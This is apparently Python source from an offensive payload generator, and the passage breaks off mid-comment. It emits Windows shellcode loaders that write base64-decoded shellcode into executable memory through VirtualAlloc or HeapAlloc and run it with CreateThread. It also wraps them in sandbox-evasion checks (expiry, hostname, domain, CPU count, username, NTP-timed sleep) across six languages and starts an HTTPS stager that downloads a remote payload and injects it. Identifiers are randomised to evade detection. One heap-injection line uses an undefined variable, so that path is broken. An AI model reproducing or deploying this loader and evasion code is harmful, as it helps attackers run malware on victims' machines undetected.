        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            self.shellcode.payload_choice = ''
        # assume custom shellcode
        else:
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode

    # Turn the textual "\x.." form into the corresponding characters, then
    # base64-encode the raw bytes; the generated script decodes it at run time.
    Shellcode = Shellcode.encode('latin-1')
    Shellcode = Shellcode.decode('unicode_escape')

    # Base64 Encode Shellcode
    EncodedShellcode = base64.b64encode(bytes(Shellcode, 'latin-1')).decode('ascii')

    # Random identifiers for the emitted Python.
    ShellcodeVariableName = evasion_helpers.randomString()
    RandPtr = evasion_helpers.randomString()
    RandHt = evasion_helpers.randomString()
    randctypes = evasion_helpers.randomString()

    # Each enabled check opens an ``if`` block; subsequent lines are indented
    # one more tab so the injection only runs when every check passes.
    num_tabs_required = 0
    payload_code = ''

    # Expiry check: the script only runs before today + EXPIRE_PAYLOAD days.
    # The date is emitted as a two-digit year ("%y-%m-%d") by slicing off the
    # century from the ISO string.
    if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
        RandToday = evasion_helpers.randomString()
        RandExpire = evasion_helpers.randomString()
        todaysdate = date.today()
        expiredate = str(todaysdate + timedelta(
            days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

        # Create Payload code
        payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n'
        payload_code += '\t' * num_tabs_required + 'from datetime import date\n'
        payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n'
        payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[
            2:] + '\",\"%y-%m-%d\") \n'
        payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n'

        # Add a tab for this check
        num_tabs_required += 1

    # Hostname check (case-sensitive substring test against platform.node()).
    if self.required_options["HOSTNAME"][0].lower() != "x":
        rand_hostname = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + 'import platform\n'
        payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n'
        payload_code += '\t' * num_tabs_required + 'if ' + rand_hostname + ' in \"' + self.required_options[
            "HOSTNAME"][0] + '\":\n'

        # Add a tab for this check
        num_tabs_required += 1

    # Domain check (case-sensitive substring test against socket.getfqdn()).
    if self.required_options["DOMAIN"][0].lower() != "x":
        rand_domain = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + 'import socket\n'
        payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n'
        payload_code += '\t' * num_tabs_required + 'if ' + rand_domain + ' in \"' + self.required_options[
            "DOMAIN"][0] + '\":\n'

        # Add a tab for this check
        num_tabs_required += 1

    # Minimum CPU-count check; PROCESSORS is interpolated as-is into the
    # comparison, so it must be an integer literal.
    if self.required_options["PROCESSORS"][0].lower() != "x":
        rand_processor_count = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + 'import multiprocessing\n'
        payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n'
        payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options[
            "PROCESSORS"][0] + ':\n'

        # Add a tab for this check
        num_tabs_required += 1

    # Username check (case-insensitive substring test against getpass.getuser()).
    if self.required_options["USERNAME"][0].lower() != "x":
        rand_user_name = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + 'import getpass\n'
        payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n'
        payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options[
            "USERNAME"][
            0] + '\'.lower() in ' + rand_user_name + '.lower():\n'

        # Add a tab for this check
        num_tabs_required += 1

    # Detection note: the generated script imports ctypes under a random alias
    # and calls kernel32 VirtualAlloc(0x3000 = MEM_COMMIT|MEM_RESERVE,
    # 0x40 = PAGE_EXECUTE_READWRITE) or HeapCreate(0x00040000 =
    # HEAP_CREATE_ENABLE_EXECUTE)/HeapAlloc(0x00000008 = HEAP_ZERO_MEMORY),
    # then RtlMoveMemory, CreateThread and WaitForSingleObject(-1). The alias
    # changes per build; the import of base64 and the API sequence do not.
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
        payload_code += '\t' * num_tabs_required + 'import base64\n'
        payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
        payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        HeapVar = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
        payload_code += '\t' * num_tabs_required + 'import base64\n'
        payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(\"' + EncodedShellcode + '\")\n'
        payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
        payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
        # NOTE(review): RandBuf is never assigned in this method, so reaching
        # this line raises NameError in the generator itself.
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'

    # Optional post-processing stage; what pyherion does to the source is
    # defined in the encryption module, not here.
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)

    self.payload_source_code = payload_code
    return
def senecas_games(evasion_payload): # Start checks to determine language # Define original values of variables num_tabs_required = 0 check_code = '' if evasion_payload.language == 'python': if evasion_payload.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(evasion_payload.required_options["EXPIRE_PAYLOAD"][0]))) # Create Payload code check_code += '\t' * num_tabs_required + 'from datetime import datetime\n' check_code += '\t' * num_tabs_required + 'from datetime import date\n' check_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n' check_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' check_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": rand_hostname = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import platform\n' check_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n' check_code += '\t' * num_tabs_required + 'if \"' + evasion_payload.required_options["HOSTNAME"][0].lower() + '\" in ' + rand_hostname + '.lower():\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": rand_domain = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import socket\n' check_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n' check_code += '\t' * num_tabs_required + 'if \"' + evasion_payload.required_options["DOMAIN"][0].lower() + '\" in ' + rand_domain + '.lower():\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": rand_processor_count = 
evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import multiprocessing\n' check_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n' check_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + evasion_payload.required_options["PROCESSORS"][0] + ':\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'import getpass\n' check_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n' check_code += '\t' * num_tabs_required + 'if \'' + evasion_payload.required_options["USERNAME"][0].lower() + '\' in ' + rand_user_name + '.lower():\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["SLEEP"][0].lower() != "x": rand_time_name = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'from time import sleep\n' check_code += '\t' * num_tabs_required + 'from socket import AF_INET, SOCK_DGRAM\n' check_code += '\t' * num_tabs_required + 'import sys\n' check_code += '\t' * num_tabs_required + 'import datetime\n' check_code += '\t' * num_tabs_required + 'import time\n' check_code += '\t' * num_tabs_required + 'import socket\n' check_code += '\t' * num_tabs_required + 'import struct\n' check_code += '\t' * num_tabs_required + 'client = socket.socket(AF_INET, SOCK_DGRAM)\n' check_code += '\t' * num_tabs_required + 'client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))\n' check_code += '\t' * num_tabs_required + 'msg, address = client.recvfrom( 1024 )\n' check_code += '\t' * num_tabs_required + rand_time_name + ' = datetime.datetime.fromtimestamp(struct.unpack("!12I",msg)[10] - 2208988800)\n' check_code += '\t' * num_tabs_required + 'sleep(' + evasion_payload.required_options["SLEEP"][0] + ')\n' check_code += '\t' * num_tabs_required + 
'client.sendto((bytes.fromhex("1b") + 47 * bytes.fromhex("01")), ("us.pool.ntp.org",123))\n' check_code += '\t' * num_tabs_required + 'msg, address = client.recvfrom( 1024 )\n' check_code += '\t' * num_tabs_required + 'if ((datetime.datetime.fromtimestamp((struct.unpack("!12I",msg)[10] - 2208988800)) - ' + rand_time_name + ').seconds >= ' + evasion_payload.required_options["SLEEP"][0] + '):\n' # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'ruby': if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += 'require \'socket\'\n' check_code += 'hostname = Socket.gethostname.downcase\n' check_code += 'if hostname[\"' + evasion_payload.required_options["HOSTNAME"][0].lower() + '\"]\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": check_code += 'require \'socket\'\n' check_code += 'domain = Socket.gethostname.downcase\n' check_code += 'if domain[\"' + evasion_payload.required_options["DOMAIN"][0].lower() + '\"]\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": check_code += 'name = ENV["USERNAME"].downcase\n' check_code += 'if name[\"' + evasion_payload.required_options["USERNAME"][0].lower() + '\"]\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["SLEEP"][0].lower() != "x": check_code += 'require \'socket\'\n' check_code += 'ntp_msg = (["00011011"] + Array.new(47,1)).pack("B8 C47")\n' check_code += 'sock = UDPSocket.new;sock.connect("us.pool.ntp.org", 123);sock.print ntp_msg;sock.flush;data,_ = sock.recvfrom(960);sock.close\n' check_code += 'firstTime = Time.at(data.unpack("B319 B32 B32")[1].to_i(2) - 2208988800)\n' check_code += 'sleep(' + evasion_payload.required_options["SLEEP"][0] + ')\n' check_code += 'sock = UDPSocket.new;sock.connect("us.pool.ntp.org", 
123);sock.print ntp_msg;sock.flush;data,_ = sock.recvfrom(960)\n' check_code += 'if (Time.at(data.unpack("B319 B32 B32")[1].to_i(2) - 2208988800) - firstTime >= ' + evasion_payload.required_options["SLEEP"][0] + ')\n' # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'perl': if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": rand_hostname = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'Use Sys::Hostname;\n' check_code += '\t' * num_tabs_required + 'my $' + rand_hostname + ' = hostname;\n' check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_hostname + '), lc(' + evasion_payload.required_options["HOSTNAME"][0] + ')) != -1){\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": rand_name = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'my $' + rand_name + ' = Win32::LoginName;\n' check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_name + '), lc(\"' + evasion_payload.required_options["USERNAME"][0] + '\")) != -1){\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": rand_domain = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'use Net::Domain qw (hostdomain);\n' check_code += '\t' * num_tabs_required + 'my $' + rand_domain + ' = hostdomain();\n' check_code += '\t' * num_tabs_required + 'if (index(lc($' + rand_domain + '), lc(\"' + evasion_payload.required_options["DOMAIN"][0] + '\")) != -1){\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": rand_corecount = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'my $' + rand_corecount + ' = $ENV{\"NUMBER_OF_PROCESSORS\"};' check_code += '\t' * num_tabs_required + 'if ($' + rand_corecount + 
' >= '+ evasion_payload.required_options["PROCESSORS"][0] + '){\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["SLEEP"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'use IO::Socket;' check_code += '\t' * num_tabs_required + 'my $firstTime;my $secondTime;my $sock = IO::Socket::INET->new(Proto => "udp",PeerPort => 123,PeerAddr => "us.pool.ntp.org",Timeout => 4);\n' check_code += '\t' * num_tabs_required + 'my $NTPTransmit = pack("B384", "00100011", (0)x14);my $secondTransmit = pack("B384", "00100011", (0)x14);\n' check_code += '\t' * num_tabs_required + '$sock->send($NTPTransmit);$sock->recv($NTPTransmit, 384);my ($Ignore, $firstTime, $Ignore2)=unpack("B319 N B32",$NTPTransmit);$firstTime -= 2208988800;$sock->close;\n' check_code += '\t' * num_tabs_required + 'sleep ' + evasion_payload.required_options["SLEEP"][0] + ';\n' check_code += '\t' * num_tabs_required + 'my $newSock = IO::Socket::INET->new(Proto => "udp",PeerPort => 123,PeerAddr => "us.pool.ntp.org",Timeout => 4);\n' check_code += '\t' * num_tabs_required + '$newSock->send($secondTransmit);$newSock->recv($secondTransmit, 384);my ($Ignore, $secondTime, $Ignore2)=unpack("B319 N B32",$secondTransmit);$newSock->close;\n' check_code += '\t' * num_tabs_required + 'my $newSock = IO::Socket::INET->new(Proto => "udp",PeerPort => 123,PeerAddr => "us.pool.ntp.org",Timeout => 4);\n' check_code += '\t' * num_tabs_required + 'if ((($secondTime - 2208988800) - $firstTime) >= ' + evasion_payload.required_options["SLEEP"][0] + ') {\n' # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'powershell': if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += "if($env:computername -eq \"" + evasion_payload.required_options["HOSTNAME"][0].lower() + "\") {\n" num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": check_code 
+= "if((Get-WMIObject -Class Win32_ComputerSystem).Domain -eq \"" + evasion_payload.required_options["DOMAIN"][0].lower() + "\") {\n" num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": check_code += "if($env:username -eq \"" + evasion_payload.required_options["USERNAME"][0].lower() + "\") {\n" num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": check_code += "if((Get-WMIObject -Class Win32_Processor).NumberOfLogicalProcessors -ge " + evasion_payload.required_options["PROCESSORS"][0].lower() + ") {\n" num_tabs_required += 1 if evasion_payload.required_options["SLEEP"][0].lower() != "x": check_code += "[Byte[]]$NTPTransmit=,1*48;$NTPTransmit[0]=0x1B;[Byte[]]$secondTransmit=,1*48;$secondTransmit[0]=0x1B;$noAccess=$false;" check_code += "Try{$Socket=New-Object Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Dgram,[Net.Sockets.ProtocolType]::Udp);$Socket.Connect('us.pool.ntp.org',123);[Void]$Socket.Send($NTPTransmit);[Void]$Socket.Receive($NTPTransmit)}catch{$noAccess=$true};" check_code += "$runTotal=0;ForEach($Index in $NTPTransmit[40..43]){$runTotal=$runTotal*256+$Index};$firstTime=(New-Object DateTime(1900,1,1,0,0,0,[DateTimeKind]::Utc)).AddMilliseconds([UInt64]($runTotal*1000)).Second;" check_code += "Start-Sleep -s " + evasion_payload.required_options["SLEEP"][0] + ";" check_code += "Try{$NewSock=New-Object Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Dgram,[Net.Sockets.ProtocolType]::Udp);$NewSock.Connect('us.pool.ntp.org',123);[Void]$NewSock.Send($secondTransmit);[Void]$NewSock.Receive($secondTransmit);$NewSock.Close()}catch{$noAccess=$true};" check_code += "$runTotal=0;ForEach($Index in $secondTransmit[40..43]){$runTotal=$runTotal*256+$Index}\n" check_code += "if ((New-Object DateTime(1900,1,1,0,0,0,[DateTimeKind]::Utc)).AddMilliseconds([UInt64]($runTotal*1000)).Second - $firstTime -ge " + 
evasion_payload.required_options["SLEEP"][0] + " -or $noAccess) {\n" num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'cs': if evasion_payload.required_options["EXPIRE_PAYLOAD"][0].lower() != "x": RandToday = evasion_helpers.randomString() RandExpire = evasion_helpers.randomString() # Create Payload code check_code += '\t' * num_tabs_required + 'DateTime {} = DateTime.Today;\n'.format(RandToday) check_code += '\t' * num_tabs_required + 'DateTime {} = {}.AddDays({});\n'.format(RandExpire, RandToday, evasion_payload.required_options["EXPIRE_PAYLOAD"][0]) check_code += '\t' * num_tabs_required + 'if ({} < {}) {{\n'.format(RandExpire, RandToday) # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(evasion_payload.required_options["HOSTNAME"][0].lower()) # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["DOMAIN"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n' # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'if (System.Environment.ProcessorCount > {}) {{\n'.format(evasion_payload.required_options["PROCESSORS"][0]) # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["USERNAME"][0].lower() != "x": rand_user_name = evasion_helpers.randomString() rand_char_name = evasion_helpers.randomString() check_code += '\t' * num_tabs_required + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(rand_user_name) check_code += '\t' * num_tabs_required + "string[] {} = {}.Split('\\\\');\n".format(rand_char_name, 
rand_user_name) check_code += '\t' * num_tabs_required + 'if ({}[1].Contains("{}")) {{\n\n'.format(rand_char_name, evasion_payload.required_options["USERNAME"][0]) # Add a tab for this check num_tabs_required += 1 if evasion_payload.required_options["SLEEP"][0].lower() != "x": check_code += '\t' * num_tabs_required + 'var NTPTransmit = new byte[48];NTPTransmit[0] = 0x1B; var secondTransmit = new byte[48]; secondTransmit[0] = 0x1B; var skip = false;\n' check_code += '\t' * num_tabs_required + 'var addr = Dns.GetHostEntry("us.pool.ntp.org").AddressList;var sock = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);\n' check_code += '\t' * num_tabs_required + 'try { sock.Connect(new IPEndPoint(addr[0], 123)); sock.ReceiveTimeout = 6000; sock.Send(NTPTransmit); sock.Receive(NTPTransmit); sock.Close(); } catch { skip = true; }\n' check_code += '\t' * num_tabs_required + 'ulong runTotal=0;for (int i=40; i<=43; ++i){runTotal = runTotal * 256 + (uint)NTPTransmit[i];}\n' check_code += '\t' * num_tabs_required + 'var t1 = (new DateTime(1900, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddMilliseconds(1000 * runTotal);\n' check_code += '\t' * num_tabs_required + 'Thread.Sleep(' + evasion_payload.required_options["SLEEP"][0] + '*1000);\n' check_code += '\t' * num_tabs_required + 'var newSock = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);\n' check_code += '\t' * num_tabs_required + 'try { var addr2 = Dns.GetHostEntry("us.pool.ntp.org").AddressList; newSock.Connect(new IPEndPoint(addr2[0], 123)); newSock.ReceiveTimeout = 6000; newSock.Send(secondTransmit); newSock.Receive(secondTransmit); newSock.Close(); } catch { skip = true; }\n' check_code += '\t' * num_tabs_required + 'ulong secondTotal = 0; for (int i = 40; i <= 43; ++i) { secondTotal = secondTotal * 256 + (uint)secondTransmit[i]; }\n' check_code += '\t' * num_tabs_required + 'if (((new DateTime(1900, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddMilliseconds(1000 * secondTotal) - 
t1).Seconds >= ' + evasion_payload.required_options["SLEEP"][0] + ' || skip) {\n' # Add a tab for this check num_tabs_required += 1 # Return check information return check_code, num_tabs_required elif evasion_payload.language == 'go': rand_username = evasion_helpers.randomString() rand_error1 = evasion_helpers.randomString() rand_hostname = evasion_helpers.randomString() rand_error2 = evasion_helpers.randomString() rand_processor = evasion_helpers.randomString() rand_domain = evasion_helpers.randomString() if evasion_payload.required_options["USERNAME"][0].lower() != "x": check_code += rand_username + ", " + rand_error1 + " := user.Current()\n" check_code += "if " + rand_error1 + " != nil {\n" check_code += "os.Exit(1)}\n" check_code += "if strings.Contains(strings.ToLower(" + rand_username + ".Username), strings.ToLower(\"" + evasion_payload.required_options["USERNAME"][0] + "\")) {\n" num_tabs_required += 1 if evasion_payload.required_options["HOSTNAME"][0].lower() != "x": check_code += rand_hostname + ", " + rand_error2 + " := os.Hostname()\n" check_code += "if " + rand_error2 + " != nil {\n" check_code += "os.Exit(1)}\n" check_code += "if strings.Contains(strings.ToLower(" + rand_hostname + "), strings.ToLower(\"" + evasion_payload.required_options["HOSTNAME"][0] + "\")) {\n" num_tabs_required += 1 if evasion_payload.required_options["PROCESSORS"][0].lower() != "x": check_code += rand_processor + " := runtime.NumCPU()\n" check_code += "if " + rand_processor + " >= " + evasion_payload.required_options["PROCESSORS"][0] + " {\n" num_tabs_required += 1 if evasion_payload.required_options["SLEEP"][0].lower() != "x": check_code += 'type ntp_struct struct {FirstByte,A,B,C uint8;D,E,F uint32;G,H uint64;ReceiveTime uint64;J uint64}\n' check_code += 'sock,_ := net.Dial("udp", "us.pool.ntp.org:123");sock.SetDeadline(time.Now().Add((6*time.Second)));defer sock.Close()\n' check_code += 'ntp_transmit := new(ntp_struct);ntp_transmit.FirstByte=0x1b\n' check_code += 
'binary.Write(sock, binary.BigEndian, ntp_transmit);binary.Read(sock, binary.BigEndian, ntp_transmit)\n' check_code += 'val := time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((ntp_transmit.ReceiveTime >> 32)*1000000000)))\n' check_code += 'time.Sleep(time.Duration(' + evasion_payload.required_options["SLEEP"][0] + '*1000) * time.Millisecond)\n' check_code += 'newsock,_ := net.Dial("udp", "us.pool.ntp.org:123");newsock.SetDeadline(time.Now().Add((6*time.Second)));defer newsock.Close()\n' check_code += 'second_transmit := new(ntp_struct);second_transmit.FirstByte=0x1b\n' check_code += 'binary.Write(newsock, binary.BigEndian, second_transmit);binary.Read(newsock, binary.BigEndian, second_transmit)\n' check_code += 'if int(time.Date(1900, 1, 1, 0, 0, 0, 0, time.UTC).Add(time.Duration(((second_transmit.ReceiveTime >> 32)*1000000000))).Sub(val).Seconds()) >= ' + evasion_payload.required_options["SLEEP"][0] + ' {' num_tabs_required += 1 # Return check information return check_code, num_tabs_required else: return '', 0
def generate(self):
    """Assemble the Python source of the HTTPS download-and-inject stager.

    The emitted script (stored in ``self.payload_source_code``) optionally
    wraps itself in the environment checks selected in ``required_options``
    (EXPIRE_PAYLOAD, HOSTNAME, DOMAIN, PROCESSORS, USERNAME), then defines
    three helpers: a byte-sum checksum, a token generator for the check-in
    URI, and an HTTPS downloader that fetches from LHOST:LPORT and hands the
    body to an in-memory loader built on ``ctypes.windll.kernel32``.
    Every helper and variable name in the emitted source is randomised.
    Returns None.
    """
    payload_code = "import urllib.request, string, random, struct, ctypes, time, ssl\n"
    # randomize everything, yo'
    sumMethodName = evasion_helpers.randomString()
    checkinMethodName = evasion_helpers.randomString()
    randLettersName = evasion_helpers.randomString()
    randLetterSubName = evasion_helpers.randomString()
    randBaseName = evasion_helpers.randomString()
    downloadMethodName = evasion_helpers.randomString()
    hostName = evasion_helpers.randomString()
    portName = evasion_helpers.randomString()
    requestName = evasion_helpers.randomString()
    tName = evasion_helpers.randomString()
    injectMethodName = evasion_helpers.randomString()
    dataName = evasion_helpers.randomString()
    byteArrayName = evasion_helpers.randomString()
    ptrName = evasion_helpers.randomString()
    bufName = evasion_helpers.randomString()
    handleName = evasion_helpers.randomString()
    data2Name = evasion_helpers.randomString()
    proxy_var = evasion_helpers.randomString()
    opener_var = evasion_helpers.randomString()
    randctypes = evasion_helpers.randomString()
    # How I'm tracking the number of nested tabs needed
    # to make the payload: each enabled environment check opens an
    # `if` block, so everything after it is indented one tab deeper.
    num_tabs_required = 0
    payload_code = ''
    if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":
        RandToday = evasion_helpers.randomString()
        RandExpire = evasion_helpers.randomString()
        # The expiry date is computed at generation time and baked into the
        # script as a literal, so the emitted check only compares clocks.
        todaysdate = date.today()
        expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
        # Create Payload code
        payload_code += '\t' * num_tabs_required + 'from datetime import datetime\n'
        payload_code += '\t' * num_tabs_required + 'from datetime import date\n'
        payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n'
        # expiredate[2:] drops the century so it matches the "%y-%m-%d" format.
        payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n'
        payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n'
        # Add a tab for this check
        num_tabs_required += 1
    if self.required_options["HOSTNAME"][0].lower() != "x":
        rand_hostname = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + 'import platform\n'
        payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n'
        # Note the operand order: the emitted test is `<node> in "<option>"`,
        # i.e. the live hostname must be a substring of the configured value.
        payload_code += '\t' * num_tabs_required + 'if ' + rand_hostname + ' in \"' + self.required_options[ "HOSTNAME"][0] + '\":\n'
        # Add a tab for this check
        num_tabs_required += 1
    if self.required_options["DOMAIN"][0].lower() != "x":
        rand_domain = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + 'import socket\n'
        payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n'
        # Same substring direction as the hostname check above.
        payload_code += '\t' * num_tabs_required + 'if ' + rand_domain + ' in \"' + self.required_options[ "DOMAIN"][0] + '\":\n'
        # Add a tab for this check
        num_tabs_required += 1
    if self.required_options["PROCESSORS"][0].lower() != "x":
        rand_processor_count = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + 'import multiprocessing\n'
        payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n'
        # The option value is spliced in unquoted, so it must be a number literal.
        payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options[ "PROCESSORS"][0] + ':\n'
        # Add a tab for this check
        num_tabs_required += 1
    if self.required_options["USERNAME"][0].lower() != "x":
        rand_user_name = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + 'import getpass\n'
        payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n'
        # Case-insensitive substring match, configured value inside the live user name.
        payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options[ "USERNAME"][ 0] + '\'.lower() in ' + rand_user_name + '.lower():\n'
        # Add a tab for this check
        num_tabs_required += 1
    # The emitted script disables TLS certificate verification globally, so the
